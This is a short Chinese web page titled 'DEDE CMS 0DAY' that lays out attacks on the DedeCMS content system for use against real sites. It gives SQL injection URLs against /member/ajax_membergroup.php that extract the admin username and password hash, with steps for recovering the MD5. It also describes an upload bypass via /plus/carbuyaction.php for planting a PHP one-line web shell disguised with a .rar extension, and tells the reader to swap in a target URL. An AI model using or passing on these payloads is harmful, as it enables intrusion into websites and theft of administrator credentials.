当前位置: 首页 > 工具软件 > DO-CMS > 使用案例 >

DEDE CMS 0DAY

纪正德
2023-12-01

radminpass.php 密码重设工具.跟目录下

注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

/member/ajax_membergroup.php?action=post&membergroup=1

/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select userid from `%23@__admin` where 1 or id=@`’`
/member/ajax_membergroup.php?action=post&membergroup=@`’` Union select pwd from `%23@__admin` where 1 or id=@`’`

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

  上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

  只要登陆会员中心,然后访问页面链接

  “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

  如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

 将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看。

 类似资料:

相关阅读

相关文章

相关问答